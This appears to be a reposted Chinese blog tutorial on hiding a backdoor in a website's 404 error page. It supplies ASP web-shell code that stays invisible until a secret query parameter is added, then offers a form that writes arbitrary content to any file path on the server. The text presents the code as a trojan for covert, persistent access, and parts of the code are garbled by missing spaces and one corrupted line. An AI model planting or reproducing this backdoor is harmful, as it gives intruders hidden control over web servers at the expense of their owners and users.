手把手打造404页面隐藏后门
我们先找一个404错误页面
手把手打造404页面隐藏后门 渗透测试 第1张
把源码复制下来保存到本地asp格式
<% ifrequest("123")="123" then %>
<title>黑白网丨Aitsec</title>
<%="
"%>
<%="Thefile location:" server.mappath(request.servervariables("script_name"))%>
<%DimobjFSO%>
<%Dim fdata%>
<%DimobjCountFile%>
<%on errorresume next%>
<%Set objFSO= Server.CreateObject("Scripting.FileSystemObject")%>
<%ifTrim(request("syfdpath"))<>"" then%>
<�ata =request("cyfddata")%>
<%SetobjCountFile=objFSO.CreateTextFile(request("syfdpath"),True)%>
<%objCountFile.Writefdata%>
<%if err =0then%>
<fontcolor=red>save!</font>
<%end if%>
<%end if%>
<%objCountFile.Close%>
<%SetobjCountFile=Nothing%>
<%Set objFSO= Nothing%>
<formaction='' method=post>
<input type=text name=syfdpath width=32value="<%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%>"style="border:solid 1px" size=80>
<textarea name=cyfddata cols=80rows=10 width=32 style="border:solid 1px"></textarea>
<input type=submit value=savestyle="border:solid 1px">
<fontcolor="#FF0000"><strong> 黑白网丨Aitsec</strong></font>
</form>
<formaction="" method="post">
<% end if%>把这段代码复制到文件头里然后保存
我们访问404页面返回的还是404
莫慌,
在url后面加上?123=123
手把手打造404页面隐藏后门 渗透测试 第2张
file:///C:/Users/ADMINI~1/AppData/Local/Temp/msohtmlclip1/01/clip_image004.jpg这样,我们的马子就出来了。
本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2018-04-084,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读